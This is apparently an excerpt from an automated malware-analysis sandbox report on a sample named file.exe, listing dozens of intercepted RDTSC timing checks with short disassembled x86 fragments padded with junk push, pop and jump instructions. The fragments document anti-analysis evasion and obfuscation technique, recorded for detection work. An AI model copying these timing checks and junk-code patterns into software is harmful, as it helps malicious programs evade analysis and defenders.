Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFEF2 second address: 9DFEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFEFD second address: 9DFF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007F44646ECA50h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jne 00007F44646ECA50h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F44646ECA58h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFF47 second address: 9DFF4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFFA1 second address: 9DFFF6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F44646ECA4Ch 0x00000008 ja 00007F44646ECA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edi, dword ptr [ebp+122D2A8Ch] 0x00000019 push 00000000h 0x0000001b xor edx, dword ptr [ebp+122D2A50h] 0x00000021 stc 0x00000022 call 00007F44646ECA49h 0x00000027 pushad 0x00000028 push edx 0x00000029 jmp 00007F44646ECA4Fh 0x0000002e pop edx 0x0000002f jmp 00007F44646ECA51h 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFFF6 second address: 9E00AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F4465131BD5h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F4465131BD3h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jmp 00007F4465131BD3h 0x00000026 pop eax 0x00000027 mov edx, dword ptr [ebp+122D1D56h] 0x0000002d push 00000003h 0x0000002f movzx ecx, bx 0x00000032 or dword ptr [ebp+122D581Fh], ecx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F4465131BC8h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D2503h], edi 0x0000005a push 00000003h 0x0000005c sbb di, E687h 0x00000061 call 00007F4465131BC9h 0x00000066 jmp 00007F4465131BCEh 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F4465131BCBh 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E00AE second address: 9E00D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F44646ECA51h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jo 00007F44646ECA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E00D4 second address: 9E00F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F4465131BC6h 0x0000000b jmp 00007F4465131BCEh 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E00F9 second address: 9E012E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F44646ECA5Fh 0x00000008 jmp 00007F44646ECA59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jng 00007F44646ECA54h 0x00000019 push eax 0x0000001a push edx 0x0000001b jno 00007F44646ECA46h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E012E second address: 9E0177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [ebp+12453A9Eh] 0x0000000d jnc 00007F4465131BDDh 0x00000013 call 00007F4465131BD0h 0x00000018 or dword ptr [ebp+122D205Bh], esi 0x0000001e pop edx 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F4465131BD0h 0x00000025 push eax 0x00000026 pushad 0x00000027 push esi 0x00000028 pushad 0x00000029 popad 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007F4465131BC6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0147A second address: A0147E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF5DD second address: 9FF5EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F4465131BC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFA47 second address: 9FFA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFA4B second address: 9FFA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFEC7 second address: 9FFEED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F44646ECA4Bh 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0007D second address: A00083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C5F0E second address: 9C5F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C5F14 second address: 9C5F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0048F second address: A0049F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 js 00007F44646ECA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0049F second address: A004A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00C6D second address: A00C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E1A second address: A00E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E20 second address: A00E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E24 second address: A00E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E2C second address: A00E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F44646ECA46h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E38 second address: A00E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00FEA second address: A00FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00FEE second address: A0101C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD5h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4465131BCFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0101C second address: A01020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01020 second address: A01024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01024 second address: A0102A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0102A second address: A01030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0480B second address: A04811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A04811 second address: A04815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06E6E second address: A06E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0702F second address: A07033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A07155 second address: A0715A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0715A second address: A07174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4465131BC6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f ja 00007F4465131BD0h 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D393 second address: A0D397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D397 second address: A0D39D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D39D second address: A0D3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C9A3 second address: A0C9A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CC2E second address: A0CC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CC37 second address: A0CC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CEF7 second address: A0CF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF05 second address: A0CF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF09 second address: A0CF23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF23 second address: A0CF49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD3h 0x00000007 pushad 0x00000008 jmp 00007F4465131BCEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D24E second address: A0D269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F44646ECA54h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F0E6 second address: A0F112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4465131BC6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4465131BCAh 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F4465131BD2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10E3F second address: A10E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10ECC second address: A10ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10ED0 second address: A10ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11079 second address: A11082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1125A second address: A1125E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A113B6 second address: A113C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4465131BCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1149D second address: A114A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11B83 second address: A11B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11B88 second address: A11BAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F44646ECA67h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F44646ECA55h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11BAE second address: A11BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1211C second address: A12120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A140C0 second address: A140C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14BCA second address: A14BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1493B second address: A1494A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14BD0 second address: A14BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F44646ECA52h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1494A second address: A1495E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4465131BD0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14BFE second address: A14C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14C03 second address: A14C08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14C08 second address: A14C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F44646ECA48h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D2ADCh] 0x00000028 mov dword ptr [ebp+122D57F1h], ebx 0x0000002e push 00000000h 0x00000030 mov edi, 4EC2FB78h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F44646ECA48h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 jmp 00007F44646ECA4Fh 0x00000056 mov esi, eax 0x00000058 xchg eax, ebx 0x00000059 push esi 0x0000005a jns 00007F44646ECA48h 0x00000060 pop esi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F44646ECA4Eh 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A16193 second address: A16197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15F31 second address: A15F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F44646ECA46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A16197 second address: A1619D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15F3E second address: A15F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1619D second address: A161C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4465131BC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F4465131BD5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A161C4 second address: A161C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17469 second address: A1746E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1BC41 second address: A1BC48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1BD3A second address: A1BD3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBB5 second address: A1DBCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBCB second address: A1DBD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBD1 second address: A1DBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1EBC2 second address: A1EBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b sub dword ptr [ebp+1244E893h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F4465131BC8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push eax 0x0000002e pushad 0x0000002f pushad 0x00000030 push esi 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DD23 second address: A1DD27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1EBFB second address: A1EC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21A26 second address: A21A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F44646ECA46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21C17 second address: A21C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4465131BC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22BEB second address: A22BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24AAA second address: A24AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24AAF second address: A24AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25C10 second address: A25C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B70 second address: A23B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D7C second address: A26D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27BF4 second address: A27BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D82 second address: A26D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27DBF second address: A27DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A28EDC second address: A28EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A28EE0 second address: A28EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
